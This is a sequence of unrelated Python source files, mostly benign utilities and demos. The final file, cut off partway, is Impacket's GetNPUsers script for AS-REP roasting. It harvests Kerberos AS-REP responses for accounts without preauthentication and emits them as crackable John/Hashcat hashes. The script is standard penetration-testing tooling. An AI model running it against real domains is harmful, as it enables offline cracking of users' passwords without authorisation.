transform_list.append(transforms.Lambda(lambda img: __scale_shortside(img, opt.load_size, method)))
if 'crop' in opt.preprocess_mode:
transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))
if opt.preprocess_mode == 'none':
base = 32
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
if opt.preprocess_mode == 'fixed':
w = opt.crop_size
h = round(opt.crop_size / opt.aspect_ratio)
transform_list.append(transforms.Lambda(lambda img: __resize(img, w, h, method)))
if opt.isTrain and not opt.no_flip:
transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))
if color:
transform_list += [transforms.ColorJitter(brightness=0.1, contrast=0.01, saturation=0.01, hue=0.01)]
if toTensor:
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def normalize():
return transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
def __resize(img, w, h, method=Image.BICUBIC):
return img.resize((w, h), method)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
def __scale_width(img, target_width, method=Image.BICUBIC):
ow, oh = img.size
if (ow == target_width):
return img
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), method)
def __scale_shortside(img, target_width, method=Image.BICUBIC):
ow, oh = img.size
ss, ls = min(ow, oh), max(ow, oh) # shortside and longside
width_is_shorter = ow == ss
if (ss == target_width):
return img
ls = int(target_width * ls / ss)
nw, nh = (ss, ls) if width_is_shorter else (ls, ss)
return img.resize((nw, nh), method)
def __crop(img, pos, size):
ow, oh = img.size
x1, y1 = pos
tw = th = size
return img.crop((x1, y1, x1 + tw, y1 + th))
def __flip(img, flip):
if flip:
return img.transpose(Image.FLIP_LEFT_RIGHT)
return img
|
py | b41066bf007954f91fd0eeca9c233e79662d24a9 | import json
import os
import sys
here = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(here, "./vendored"))
import requests
TOKEN = os.environ['TELEGRAM_TOKEN']
BASE_URL = f"https://api.telegram.org/bot{TOKEN}"
def manualLoad(headersfilename='headers.txt'):
unorderedlist = []
with open(headersfilename, "r") as f:
unorderedlist = f.read().splitlines()
datadict = {}
for i in range(len(unorderedlist)):
datadict[i+1] = unorderedlist[i]
return datadict
def hello(event, context):
try:
data = json.loads(event["body"])
message = str(data["message"]["text"]).strip('/')
chat_id = data["message"]["chat"]["id"]
response = f"Enter rule number:"
try:
num = int(message)
datadict = manualLoad()
if num in datadict:
response = f"RULE #{num} // {datadict[num]}"
else:
response = "No such rule number."
except ValueError as ve:
print(ve)
data = {"text": response.encode("utf8"), "chat_id": chat_id}
url = f"{BASE_URL}/sendMessage"
requests.post(url, data)
except Exception as e:
print(e)
return {"statusCode": 200} |
py | b4106776cf050126f4ea834feeaaca94c3f81f15 | #NVDAObjects/IAccessible/SysMonthCal32.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2006-2007 NVDA Contributors <http://www.nvda-project.org/>
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
import controlTypes
from . import IAccessible
class SysMonthCal32(IAccessible):
def _get_role(self):
return controlTypes.ROLE_CALENDAR
def _get_name(self):
return ""
def _get_value(self):
return super(SysMonthCal32,self).name
def script_valueChange(self,gesture):
gesture.send()
self.event_valueChange()
__valueChangeGestures = (
"kb:upArrow",
"kb:downArrow",
"kb:leftArrow",
"kb:rightArrow",
"kb:home",
"kb:end",
"kb:control+home",
"kb:control+end",
"kb:pageDown",
"kb:pageUp",
)
def initOverlayClass(self):
for gesture in self.__valueChangeGestures:
self.bindGesture(gesture, "valueChange")
|
py | b41068198356f64db15e5db1be9c28357a061837 | # A Python program to demonstrate inheritance
# Base or Super class. Note object in bracket.
# (Generally, object is made ancestor of all classes)
# In Python 3.x "class Person" is
# equivalent to "class Person(object)"
class Base(object):
# Constructor
def __init__(self, name):
self.name = name
# To get name
def getName(self):
return self.name
# Inherited or Sub class (Note Person in bracket)
class Child(Base):
# Constructor
def __init__(self, name, age):
Base.__init__(self, name)
self.age = age
# To get name
def getAge(self):
return self.age
# Inherited or Sub class (Note Person in bracket)
class GrandChild(Child):
# Constructor
def __init__(self, name, age, address):
Child.__init__(self, name, age)
self.address = address
# To get address
def getAddress(self):
return self.address
# Driver code
g = GrandChild("Geek1", 23, "Noida")
print(g.getName(), g.getAge(), g.getAddress())
|
py | b41068afafdcae21eebcc9f5aece429a167b6a80 | #!/usr/bin/env python
import os
from evaluation.tools.math_utils import locate_min
from evo.core import result
import glog as log
def write_latex_table_header(cols_names_list, sub_cols_names_list):
""" If you don't want sub_cols in the table just set it to 1.
cols_names_list: List of names of the columns, typically pipeline names (S, SP, SPR, ...).
sub_cols_names_list: List of names of the sub-columns, typically metrics names (Median, RMSE, Drift, ...).
"""
assert(type(cols_names_list) == list)
assert(type(sub_cols_names_list) == list)
cols = len(cols_names_list)
sub_cols = len(sub_cols_names_list)
start_line = """\\begin{table*}[h]
\\centering
\\caption{Accuracy of the State Estimation}
\\label{tab:accuracy_comparison}
\\begin{tabularx}{\\textwidth}{l *%s{Y}}
\\toprule
& \\multicolumn{%s}{c}{APE Translation} \\\\
\\cmidrule{2-%s}
"""%(cols * sub_cols, cols * sub_cols, cols * sub_cols + 1)
cols_header_line=""
if sub_cols <= 1:
cols_header_line = """Sequence """
mid_rule_line=""
col_counter = 0
for col_name in cols_names_list:
if sub_cols > 1:
cols_header_line = cols_header_line + """& \\multicolumn{%s}{c}{\\textbf{%s}} """%(sub_cols, col_name)
mid_rule_line = mid_rule_line + """\\cmidrule(r){%s-%s}"""%(col_counter, col_counter + sub_cols)
else:
cols_header_line = cols_header_line + """& \\textbf{%s} """%(col_name)
col_counter = col_counter + sub_cols
break_row = """ \\\\"""
sub_cols_header_line = ""
if sub_cols > 1:
sub_cols_header_line = """Sequence """
for col_name in cols_names_list:
for sub_col_name in sub_cols_names_list:
sub_cols_header_line = sub_cols_header_line + """& %s """ % (sub_col_name)
start_line = start_line + cols_header_line + break_row + "\n" + sub_cols_header_line + break_row + "\n \\midrule \n"
return start_line
def write_latex_table(stats, results_dir):
""" Write latex table with median, mean and rmse from stats:
which is a list that contains:
- dataset name (string) (like V1_01_easy, MH_01_easy etc):
- pipeline type (string) (like S, SP or SPR):
- "absolute_errors":
- "max"
- "min"
- "mean"
- "median"
- "q1"
- "q3"
- "rmse"
- "trajectory_length_m"
"""
# Assumes an equal number of cols/keys per row
cols_names_list = list(sorted(stats[list(stats.keys())[0]].keys()))
sub_cols_names_list = ["Median [cm]", "RMSE [cm]", "Drift [\\%]"]
start_line = write_latex_table_header(cols_names_list, sub_cols_names_list)
end_line = """
\\bottomrule
\\end{tabularx}%
\\end{table*}{}
"""
bold_in = '& \\textbf{'
bold_out = '} '
end = '\\\\\n'
all_lines = start_line
winners = dict()
for dataset_name, pipeline_types in sorted(stats.items()):
median_error_pos = []
# mean_error_pos = []
rmse_error_pos = []
drift = []
i = 0
for pipeline_type, pipeline_stats in sorted(pipeline_types.items()):
assert(cols_names_list[i] == pipeline_type) # Ensure col names and results are consistent!
i += 1
assert(isinstance(pipeline_stats["absolute_errors"], result.Result))
# if pipeline_type is not "S": # Ignore S pipeline
median_error_pos.append(pipeline_stats["absolute_errors"].stats["median"])
# mean_error_pos.append(pipeline_stats["absolute_errors"]["mean"])
rmse = pipeline_stats["absolute_errors"].stats["rmse"]
rmse_error_pos.append(rmse)
assert(pipeline_stats["trajectory_length_m"] > 0)
# THIS IS NOT ACTUALLY DRIFT: bcs the trajectory_length_m is the length of the estimated traj...
# not the ground-truth one...
drift.append(rmse / pipeline_stats["trajectory_length_m"])
log.error("DRIFT IS: %f"%(rmse / pipeline_stats["trajectory_length_m"]))
# Find winning pipeline
_, median_idx_min = locate_min(median_error_pos)
# _, mean_idx_min = locate_min(mean_error_pos)
_, rmse_idx_min = locate_min(rmse_error_pos)
_, drift_idx_min = locate_min(drift)
# Store winning pipeline
winners[dataset_name] = [median_idx_min,
# mean_idx_min,
rmse_idx_min,
drift_idx_min]
for dataset_name, pipeline_types in sorted(stats.items()):
start = '{:>25} '.format(dataset_name.replace('_', '\\_'))
one_line = start
pipeline_idx = 0
for pipeline_type, pipeline_stats in sorted(pipeline_types.items()):
assert(isinstance(pipeline_stats["absolute_errors"], result.Result))
log.info("Pipeline type: %s"%pipeline_type)
# if pipeline_type is not "S": # Ignore S pipeline
median_error_pos = pipeline_stats["absolute_errors"].stats["median"] * 100 # as we report in cm
# mean_error_pos = pipeline_stats["absolute_errors"]["mean"] * 100 # as we report in cm
rmse = pipeline_stats["absolute_errors"].stats["rmse"]
rmse_error_pos = rmse * 100 # as we report in cm
assert(pipeline_stats["trajectory_length_m"] > 0)
drift = rmse / pipeline_stats["trajectory_length_m"] * 100 # as we report in %
# Bold for min median error
if len(winners[dataset_name][0]) == 1 and pipeline_idx == winners[dataset_name][0][0]:
one_line += bold_in + '{:.1f}'.format(median_error_pos) + bold_out
else:
one_line += '& {:.1f} '.format(median_error_pos)
# Bold for min mean error
# if len(winners[dataset_name][1]) == 1 and winners[dataset_name][1][0] == pipeline_idx:
# one_line += bold_in + '{:.1f}'.format(mean_error_pos) + bold_out
# else:
# one_line += '& {:.1f} '.format(mean_error_pos)
# Bold for min rmse error
# Do not bold, if multiple max
if len(winners[dataset_name][1]) == 1 and winners[dataset_name][1][0] == pipeline_idx:
one_line += bold_in + '{:.1f}'.format(rmse_error_pos) + bold_out
else:
one_line += '& {:.1f} '.format(rmse_error_pos)
# Bold for min drift error
# Do not bold, if multiple max
if len(winners[dataset_name][2]) == 1 and winners[dataset_name][2][0] == pipeline_idx:
one_line += bold_in + '{:.1f}'.format(drift) + bold_out
else:
one_line += '& {:.1f} '.format(drift)
pipeline_idx += 1
one_line += end
all_lines += one_line
all_lines += end_line
# Save table
results_file = os.path.join(results_dir, 'APE_table.tex')
print("Saving table of APE results to: " + results_file)
with open(results_file,'w') as outfile:
outfile.write(all_lines)
|
py | b41068afc860cf30896654ab00917e0358bd4549 | """
WSGI config for TheThingsIBuy project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TheThingsIBuy.settings')
application = get_wsgi_application()
|
py | b41069940b3579c62a083005c3038e1e23d6b871 | import os.path as osp
import torch
import torch.nn.functional as F
from scripts.study_case.ID_4.torch_geometric.datasets import Planetoid
from scripts.study_case.ID_4.torch_geometric.nn import GraphUNet
from scripts.study_case.ID_4.torch_geometric.utils import dropout_adj
dataset = 'Cora'
path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', dataset)
dataset = Planetoid(path, dataset)
data = dataset[0]
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
pool_ratios = [2000 / data.num_nodes, 0.5]
self.unet = GraphUNet(dataset.num_features, 32, dataset.num_classes,
depth=3, pool_ratios=pool_ratios)
def forward(self):
edge_index, _ = dropout_adj(
data.edge_index, p=0.2, force_undirected=True,
num_nodes=data.num_nodes, training=self.training)
x = F.dropout(data.x, p=0.92, training=self.training)
x = self.unet(x, edge_index)
return F.log_softmax(x, dim=1)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model, data = Net().to(device), data.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=0.001)
def train():
model.train()
optimizer.zero_grad()
F.nll_loss(model()[data.train_mask], data.y[data.train_mask]).backward()
optimizer.step()
def test():
model.eval()
logits, accs = model(), []
for _, mask in data('train_mask', 'val_mask', 'test_mask'):
pred = logits[mask].max(1)[1]
acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()
accs.append(acc)
return accs
best_val_acc = test_acc = 0
for epoch in range(1, 201):
train()
train_acc, val_acc, tmp_test_acc = test()
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = tmp_test_acc
log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'
print(log.format(epoch, train_acc, best_val_acc, test_acc))
|
py | b4106a0aaf7e2a9b80e6ddb018d76e9ec33db6fa | # Copyright 2019 1QBit
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
class ElectronicStructureSolver(abc.ABC):
"""Sets interface for objects that perform energy estimation of a molecule.
Specifics vary between concrete implementations, but common to all of them
is that after `simulate` is called, the right internal state is set for the
class so that `get_rdm` can return the reduced density matrix for the last
run simulation.
"""
def __init__(self):
pass
@abc.abstractmethod
def simulate(self, molecule, mean_field=None):
"""Performs the simulation for a molecule.
The mean field is calculated automatically if not passed in by the
calling code.
Args:
molecule (pyscf.gto.Mole): The molecule on which to perform the
simluation.
mean_field (pyscf.scf.RHF): The mean filed of the molecule. Computed
automatically if `None` is passed in.
"""
pass
@abc.abstractmethod
def get_rdm(self):
"""Returns the RDM for the previous simulation.
In a concrete implementation, the `simulate` function would set the
necessary internal state for the class so that this function can return
the reduced density matrix.
Returns:
(numpy.array, numpy.array): The one- and two-particle RDMs (float64).
Raises:
RuntimeError: If no simulation has been run.
"""
pass
|
py | b4106b0acff680d814400920ed36dcbadd31988c | from radiomixer.io.signal import Signal
from radiomixer.transforms.transform import Transform, TransformType
class ExtractSegment(Transform):
def __init__(self):
super().__init__(TransformType.EXTRACTSEGMENT)
def process(self, signal:Signal):
signal.name = self._prepend_transform_name(signal.name)
start, end = signal.parameters['segment'][0], signal.parameters['segment'][1]
if signal.data.shape[0]==1:
audio = signal.data.squeeze(0)
signal.data = audio[start:end].view(1, -1)
return signal
|
py | b4106b3105ac17209df052a066615fb58b28618f | import re
import requests
import datetime
import pytz
from bs4 import BeautifulSoup
FITNESS_URL = "https://connect2concepts.com/connect2/?type=bar&key=650471C6-D72E-4A16-B664-5B9C3F62EEAC"
CALENDAR_URL = "https://api.teamup.com/ks13d3ccc86a21d29e/events"
class Fitness(object):
"""Used to interact with the Penn Recreation usage pages.
Usage::
>>> from penn import Fitness
>>> fit = Fitness('SCHEDULE_TOKEN')
>>> fit.get_usage()
"""
def __init__(self, schedule_token):
self.token = schedule_token
def get_schedule(self):
resp = requests.get(CALENDAR_URL, timeout=30, headers={
"Teamup-Token": self.token
})
resp.raise_for_status()
raw_data = resp.json()
data = {}
for item in raw_data["events"]:
name = re.sub(r"\s*(Hours)?\s*-?\s*(CLOSED|OPEN)?$", "", item["title"], re.I).rsplit("-", 1)[0].strip().title()
out = {
"all_day": item["all_day"]
}
if not item["all_day"]:
out["start"] = item["start_dt"]
out["end"] = item["end_dt"]
else:
out["day"] = item["start_dt"].split("T")[0]
if name not in data:
data[name] = {
"name": name,
"hours": []
}
data[name]["hours"].append(out)
return list(data.values())
def get_usage(self):
"""Get fitness locations and their current usage."""
resp = requests.get(FITNESS_URL, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
}, timeout=30)
resp.raise_for_status()
soup = BeautifulSoup(resp.text, "html5lib")
eastern = pytz.timezone('US/Eastern')
output = []
for item in soup.findAll("div", {"class": "barChart"}):
data = [x.strip() for x in item.get_text("\n").strip().split("\n")]
data = [x for x in data if x]
name = re.sub(r"\s*(Hours)?\s*-?\s*(CLOSED|OPEN)?$", "", data[0], re.I).strip()
output.append({
"name": name,
"open": "Open" in data[1],
"count": int(data[2].rsplit(" ", 1)[-1]),
"updated": eastern.localize(datetime.datetime.strptime(data[3][8:].strip(), '%m/%d/%Y %I:%M %p')).isoformat(),
"percent": int(data[4][:-1])
})
return output
|
py | b4106be9a45dbd10ec90aad57743c821fa100944 | # 881. 救生艇
#
# 20200725
# huao
# 因为有一个救生艇最多两个人的限制,所有这样想应该是没问题的
# 从大到小排序
# 找最重的那个人,给他找一个救生艇可以承受的同伴一组
# 重复上述操作即可
# 因为排过序,所有可以二分查找,不然会超时
from typing import List
class Solution:
def numRescueBoats(self, people: List[int], limit: int) -> int:
people.sort(reverse=True)
i = 0
count = 0
while i < len(people):
j = self.binarySearch(
people, limit - people[i], i + 1, len(people))
if j >= 0:
people.pop(j)
count += 1
i += 1
return count
def binarySearch(self, people: List[int], target: int, begin: int, end: int) -> int:
if begin == end:
return -1
if begin + 1 == end:
if people[begin] <= target:
return begin
elif end != len(people) and people[end] <= target:
return end
else:
return -1
mid = (begin + end) // 2
if people[mid] == target:
return mid
elif people[mid] > target:
return self.binarySearch(people, target, mid, end)
else:
return self.binarySearch(people, target, begin, mid)
sol = Solution()
print(sol.numRescueBoats([1, 2, 2, 3], 3))
print(sol.numRescueBoats([3, 5, 3, 4], 5))
print(sol.numRescueBoats([44, 10, 29, 12, 49, 41, 23, 5, 17, 26], 50))
|
py | b4106c1e19deb5af515b517974a4ae557b9126fe | # Author: OMKAR PATHAK
# leaf node is the one which does not have any children
from Tree import Node
def countLeafNodes(root):
if root is None:
return 0
if(root.left is None and root.right is None):
return 1
else:
return countLeafNodes(root.left) + countLeafNodes(root.right)
if __name__ == '__main__':
root = Node(1)
root.setLeft(Node(2))
root.setRight(Node(3))
root.left.setLeft(Node(4))
print('Count of leaf nodes:',countLeafNodes(root))
|
py | b4106c5b509168f4e28d8328de977f3b1ea82cd3 | class Solution(object):
def groupAnagrams(self, strs):
"""
:type strs: List[str]
:rtype: List[List[str]]
"""
ret,table = [],{}
for i in range(len(strs)):
s = str(sorted(strs[i]))
if s in table:
table[s].append(strs[i])
else:
table[s] = [strs[i]]
for key in table: ret.append(table[key])
return ret
|
py | b4106e03e080e735a27cd3db4e7bfeb1e7c4cdc0 | import argparse
import logging
from pathlib import PurePath
from pandas import DataFrame, read_csv
from tqdm import tqdm
from .helpers.auxfunc import AuxFuncPack
from .conv.export_dfs import DfExporter
logging.basicConfig(level=logging.INFO, format='%(message)s')
class CoreMethods:
def start_main(self):
# get options from user
parser = argparse.ArgumentParser(description='Analyse mutation on all nucleotide alignment .fasta files from a target.')
parser.add_argument(
'target', help='Target .fasta file to be analysed.', type=str,
metavar='TARGET'
)
parser.add_argument(
'reportType', help='Output report file type.', type=str,
choices=['csv', 'xls', 'all'], metavar='REPORTTYPE'
)
parser.add_argument(
'--reportName', help='Output report custom file name.'
)
parser.add_argument(
'--reportPath', help='Output report custom file path.'
)
parser.add_argument(
'--searchKP', help='Custom keyphrase to detect searchable sequences.'
)
parser.add_argument(
'--debug', help='Turn debug messages on.', action='store_true'
)
args = vars(parser.parse_args())
# config logging
self.set_debug_mode(args['debug'])
# run
searchable_keyphrase = args['searchKP'] if (args['searchKP'] is not None) else 'consensus sequence'
results_df_list = self.start_run(args['target'], searchable_keyphrase)
# export dfs
report_path = args['reportPath'] if (args['reportPath'] is not None) else PurePath(args['target']).parent
report_name = args['reportName'] if (args['reportName'] is not None) else PurePath(args['target']).name
self.start_export(
results_df_list, args['reportType'], report_name, report_path
)
logging.debug('Done.')
def start_run(self, target_path, searchable_keyphrase):
# run analyser
logging.debug(f'Starting analysis for {target_path}')
# create handler of custom functions
auxf_handler = AuxFuncPack()
# create list from .fasta target file
target_folder = PurePath(target_path).parent
target_list = auxf_handler.fasta_to_list(target_path)
# create dfs
df_mut_results = DataFrame(columns=['ColNum', 'PossibleCodons', 'PossibleMuts', 'PossiblePols', 'GenScore'])
df_alert_results = DataFrame(columns=['SeqName', 'ColNum', 'AlertType'])
df_codons = read_csv(PurePath(__file__).parent.parent / 'data' / 'codons.csv')
df_pols = read_csv(PurePath(__file__).parent.parent / 'data' / 'pols.csv')
# execute deep searcher on each column from .fasta target file
number_codons = int(len(target_list[0][1])/3)
isDebugModeActive = logging.getLogger().isEnabledFor(logging.DEBUG)
for current_codon in tqdm(range(0, number_codons), disable=not isDebugModeActive):
current_col = current_codon*3 # aiming codon's initial position
root, df_alert_results = auxf_handler.deep_searcher(
target_folder, target_list, current_col, df_alert_results, searchable_keyphrase
)
# get root list of elements
codon_leaves = []
for leaf in root.leaves:
# keep only codons without special chars
if len(set(leaf.codon).difference(set(['A', 'C', 'T', 'G']))) == 0:
codon_leaves.append(leaf.codon)
# unify list
unified_list = list(set(codon_leaves))
if len(unified_list) > 1:
# get codons percentages dict
codons_dict = auxf_handler.get_codons_perc_dict(root, unified_list)
# get aminos from codons
aminos_dict = auxf_handler.get_aminos_from_codons(codons_dict, df_codons)
# get codons mutations dict
muts_dict = auxf_handler.get_mutations_perc_dict(aminos_dict, codons_dict, df_codons)
# get polarities percentages dict
pols_dict = auxf_handler.get_polarities_perc_dict(aminos_dict, df_pols)
# get polarity score
curr_pol_score = auxf_handler.get_pol_score(pols_dict, df_pols)
# get general score
curr_gen_score = auxf_handler.get_gen_score(curr_pol_score, muts_dict)
# round dict values
codons_dict = auxf_handler.round_dict_values(codons_dict, 5, True)
muts_dict = auxf_handler.round_dict_values(muts_dict, 5, False)
pols_dict = auxf_handler.round_dict_values(pols_dict, 5, True)
# increment on df_mut_results
df_mut_results = df_mut_results.append(
{
'ColNum': current_col+1,
'PossibleCodons': codons_dict,
'PossibleMuts': muts_dict,
'PossiblePols': pols_dict,
'GenScore': round(curr_gen_score, 5)
}, ignore_index=True
)
results_df_list = [df_mut_results, df_alert_results]
return results_df_list
def start_export(self, results_df_list, report_type, report_name, report_path):
# export dfs
DfExporter().export_dfs(
results_df_list, report_type, report_name, report_path
)
def set_debug_mode(self, isActive):
curr_level = logging.DEBUG if isActive else logging.INFO
logging.getLogger().setLevel(curr_level) |
py | b4106eb7c0e326a2165e41a2af5f560b892358d6 | #!/usr/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This script will attempt to list and get TGTs for those users that have the property
# 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
# For those users with such configuration, a John The Ripper output will be generated so
# you can send it for cracking.
#
# Original credit for this technique goes to @harmj0y:
# https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
# Related work by Geoff Janjua:
# https://www.exumbraops.com/layerone2016/party
#
# For usage instructions run the script with no parameters
#
# ToDo:
#
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import logging
import random
import sys
from binascii import hexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.kerberosv5 import sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserNoPreAuth:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def __init__(self, username, password, domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__no_pass = cmdLineOptions.no_pass
self.__outputFileName = cmdLineOptions.outputfile
self.__outputFormat = cmdLineOptions.format
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGT = cmdLineOptions.request
self.__kdcHost = cmdLineOptions.dc_ip
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s')
else:
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self, userName, requestPAC=True):
clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = self.__domain.upper()
serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
encodedPacRequest = encoder.encode(pacRequest)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacRequest
reqBody = seq_set(asReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.proxiable.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
seq_set(reqBody, 'cname', clientName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['rtime'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
# RC4 not available, OK, let's ask for newer types
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
r = sendReceive(message, domain, self.__kdcHost)
else:
raise e
# This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
# 'Do not require Kerberos preauthentication' set
try:
asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
except:
# Most of the times we shouldn't be here, is this a TGT?
asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
else:
# The user doesn't have UF_DONT_REQUIRE_PREAUTH set
raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
if self.__outputFormat == 'john':
# Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
else:
# Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
return '$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
@staticmethod
def outputTGT(entry, fd=None):
if fd is None:
print(entry)
else:
fd.write(entry + '\n')
def run(self):
if self.__usersFile:
self.request_users_file_TGTs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None:
target = self.__kdcHost
else:
target = self.__domain
# Are we asked not to supply a password?
if self.__doKerberos is False and self.__no_pass is True:
# Yes, just ask the TGT and exit
logging.info('Getting TGT for %s' % self.__username)
entry = self.getTGT(self.__username)
self.outputTGT(entry, None)
return
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
# Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled)
logging.info('Cannot authenticate %s, getting its TGT' % self.__username)
entry = self.getTGT(self.__username)
self.outputTGT(entry, None)
return
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
